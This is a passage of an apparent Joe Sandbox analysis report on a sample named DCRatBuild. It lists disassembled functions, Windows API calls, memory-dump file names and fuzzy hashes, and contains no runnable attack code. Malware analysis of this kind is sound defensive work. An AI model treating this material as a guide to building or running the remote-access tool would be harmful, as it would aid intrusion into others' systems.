Opcode Fuzzy Hash: 89b719549124d939c26dffdaa11be5020544515de31058baf2bc70c72192773f
Instruction Fuzzy Hash: 520169309206A0DAD726FBA8D0557EDBBE49F64704F9084CDA45A63283CBB41B08D7A3

Function 00B1A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00B1A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A6C4
Part of subcall function 00B1A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A6F2
Part of subcall function 00B1A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B1A592,000000FF,?,?), ref: 00B1A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B1A598

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 81304940c12ba556b2d896fac66d2ea68fd066bb941306c612c83771a1ab0290
Instruction ID: cb93983c87867672a960028d8e62ce14ee8e3fe47eca0f47331a3178519d5c8c
Opcode Fuzzy Hash: 81304940c12ba556b2d896fac66d2ea68fd066bb941306c612c83771a1ab0290
Instruction Fuzzy Hash: AEF0823500E790AACB2257B48904BCBBBD56F2A331F448A89F1FD5219AC27560D89B63

Function 00B20E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00B20E3D

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 25fd31babafaa60287d05a941f00175fe06b9dce3a165e9a3191c8317a8341bd
Instruction ID: 0103939745fd94fe4b0687449133389b99ef8024db6aad062bd1d5d2eb0b00f5
Opcode Fuzzy Hash: 25fd31babafaa60287d05a941f00175fe06b9dce3a165e9a3191c8317a8341bd
Instruction Fuzzy Hash: CED0C201A250642ADA11332C38197FE26E6CFD6312F0D08E5F14D572C3CE4409C6A3A2

Function 00B2A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00B2A62C

Part of subcall function 00B2A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B2A3DA

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 7a730b4abd6bae76ebb21c38d08806f39e3592076fb91e8e64f1464f687af136
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: BCD0A930200218BBDF02AF22EC02A7E7AE9EB00340F0080A1B84AC5181EBB1E910A262

Function 00B2E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00B2E5E3

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 9769e6e62913c62213af881c2bea9b7993a664049050a3251c89c27b38e971bb
Instruction ID: 69429bd3ddc77831626f665638a3035ae31ef6dd1673346134108f29978fe276
Opcode Fuzzy Hash: 9769e6e62913c62213af881c2bea9b7993a664049050a3251c89c27b38e971bb
Instruction Fuzzy Hash: 75D0A9B00902A08FC203EBFEB98271433D0F326700F8408C0B16C8A4A1CF78C495C622

Function 00B2DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B21B3E), ref: 00B2DD92

Part of subcall function 00B2B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B2B579
Part of subcall function 00B2B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B2B58A
Part of subcall function 00B2B568: IsDialogMessageW.USER32(00010484,?), ref: 00B2B59E
Part of subcall function 00B2B568: TranslateMessage.USER32(?), ref: 00B2B5AC
Part of subcall function 00B2B568: DispatchMessageW.USER32(?), ref: 00B2B5B6

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 352e6291074ace92ee08e0372f79cd668f0c50b342591398b80fbc1f56ad7b11
Instruction ID: b3c62898bd6a94f48ff87b0f718f14717ed7ad6404139a2c99f125ef3232d4a8
Opcode Fuzzy Hash: 352e6291074ace92ee08e0372f79cd668f0c50b342591398b80fbc1f56ad7b11
Instruction Fuzzy Hash: 48D09E31154300FAD6012B51DD06F0A7BE2AB9CB05F404595B289750B18E72AD61EF11

Function 00B198BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00B197BE), ref: 00B198C8

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 897b6e7112c8bb15adc9577c6045bb049b4501da6e64134bcd915dcc5243f8d6
Instruction ID: e673c28d7b1bf350a5ed73b08727ca4ac5f00177458cf0dae7b64409ffd2ad71
Opcode Fuzzy Hash: 897b6e7112c8bb15adc9577c6045bb049b4501da6e64134bcd915dcc5243f8d6
Instruction Fuzzy Hash: E0C01238400285868E208A2498680D973A2EB537E67F887D4C03CCA0E1C322CCD7EA21

Function 00B2E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7237d68c3a0e81a10820dd87da269d588c35f6f008d36bba6e20e5f0a858965f
Instruction ID: 042bd64a17688f2e8df4933b8814da4a8e9f8ad1872b473993d5aff202a504bc
Opcode Fuzzy Hash: 7237d68c3a0e81a10820dd87da269d588c35f6f008d36bba6e20e5f0a858965f
Instruction Fuzzy Hash: 7EB09292269010AC214452062802C3A02DCC082F12320C0BAF86DD4580A840E9042431

Function 00B2E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a62379483dc9087a414d49b553e4d2593829b5cd3230b7d4dfbe810cd6d7a02
Instruction ID: 839231a50337c84b053f45357c607b65fd37445a31a80158ca9b4a9d056b66a2
Opcode Fuzzy Hash: 5a62379483dc9087a414d49b553e4d2593829b5cd3230b7d4dfbe810cd6d7a02
Instruction Fuzzy Hash: 0AB09296269110AC3144524A2842C3B02DCD081F1232080BAF82ED4480A840AD402532

Function 00B2E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bdb44f914a7ffa022217926fd8c46a907412bd1c91ae6c637c5d1afe1fc8fc09
Instruction ID: fa566e91cd52c642e017df988fffae88b46945ac37a214c04d426d2785a0cce0
Opcode Fuzzy Hash: bdb44f914a7ffa022217926fd8c46a907412bd1c91ae6c637c5d1afe1fc8fc09
Instruction Fuzzy Hash: 70B09296269110BC210412462852C3B02DCC082F1232084BAF86AE4880A840ED402431

Function 00B2E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 514b71ae7d685e1f30cc38103c70c1f316176e5a28d2fdad97d516c617a40d15
Instruction ID: dad55dccafa623ceac05e9c943ab840cb138ddccefdb606c8faee297f69e8d3a
Opcode Fuzzy Hash: 514b71ae7d685e1f30cc38103c70c1f316176e5a28d2fdad97d516c617a40d15
Instruction Fuzzy Hash: 16B092A2269020AC214452062942C3A02DCC081F1232080BAF82DD4480A840AA012431

Function 00B2E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cfc08e4769c1f977c9b58c6813687dd227b965ff7db664b540557902eca7e8b7
Instruction ID: 078854d9f697e2d55c46cf919f83c72eb54acc08935cda02b3f5e871fa46f293
Opcode Fuzzy Hash: cfc08e4769c1f977c9b58c6813687dd227b965ff7db664b540557902eca7e8b7
Instruction Fuzzy Hash: 87B092A2269020AC218452062902C3A02DCC081F1232080BAF82DD4480E840AA012431

Function 00B2E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2bb74e436c5a0f68417dd9cc64feb68251eff67dd5b7624a814eb738878c2ff5
Instruction ID: 5df08a35d71ea885337c438718a175eb33ea4e1af54b0720f833e6d3a327d114
Opcode Fuzzy Hash: 2bb74e436c5a0f68417dd9cc64feb68251eff67dd5b7624a814eb738878c2ff5
Instruction Fuzzy Hash: BBB092A2269010AC318452072802C3A02DCD081F1232080BAF82DD4480A840AA002432

Function 00B2E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8176ccb573c119d96b843e39ab127c1b6d7bd3e61787a40eabddd8e232bdcc26
Instruction ID: 80488917f3a709f9197b9e36ddd63853ba3a683e642867b82ea7d083ff7790da
Opcode Fuzzy Hash: 8176ccb573c119d96b843e39ab127c1b6d7bd3e61787a40eabddd8e232bdcc26
Instruction Fuzzy Hash: E8B092A2269110BC218452062802C3A02DCC081F1232081BAF82DD4880A840AA402431

Function 00B2E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 75a11828028f6bea90612a6adf8e97c5ad3bacc22a0dd26a6cf2b6eb89532d19
Instruction ID: f8e3f72d23fc12560bdad261bc20415c971ac2a73118c2f1e9002bc490207cc6
Opcode Fuzzy Hash: 75a11828028f6bea90612a6adf8e97c5ad3bacc22a0dd26a6cf2b6eb89532d19
Instruction Fuzzy Hash: 59B092A2269010BC218452062802C3A02DCC082F1232080BAF86DD4480A840EA002431

Function 00B2E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 342bde6e6e707d5ee856ea3664f38e5b17188a5fe5c2a0c1623be12af437b1ba
Instruction ID: 01a3cb043d50c43b75e6cf0c9766fbde38f6290b4d9804cb1d5d2d7acde0e276
Opcode Fuzzy Hash: 342bde6e6e707d5ee856ea3664f38e5b17188a5fe5c2a0c1623be12af437b1ba
Instruction Fuzzy Hash: 2BB09292269150BC218452062802C3A02DCC081F1232081BAF82DD4980A840A9442431

Function 00B2E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8effb828e64ff639f9e4a4ff506d55f77d1d85c0c4a48aa77421f1f4a4a05e7d
Instruction ID: ed10c27a842242126c6c795fc68c07af3395e0be8d544625f859a3c738c7900f
Opcode Fuzzy Hash: 8effb828e64ff639f9e4a4ff506d55f77d1d85c0c4a48aa77421f1f4a4a05e7d
Instruction Fuzzy Hash: 17B09292269020AC214452062902C3A02DCC081F1233080BAF82DD4580A850AA092431

Function 00B2E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B2E1E3

Part of subcall function 00B2E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B2E8D0
Part of subcall function 00B2E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B2E8E1

Memory Dump Source

Source File: 00000003.00000002.1702197801.0000000000B11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000003.00000002.1701956900.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702411786.0000000000B43000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B4E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702461449.0000000000B72000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1702556522.0000000000B73000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b10000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
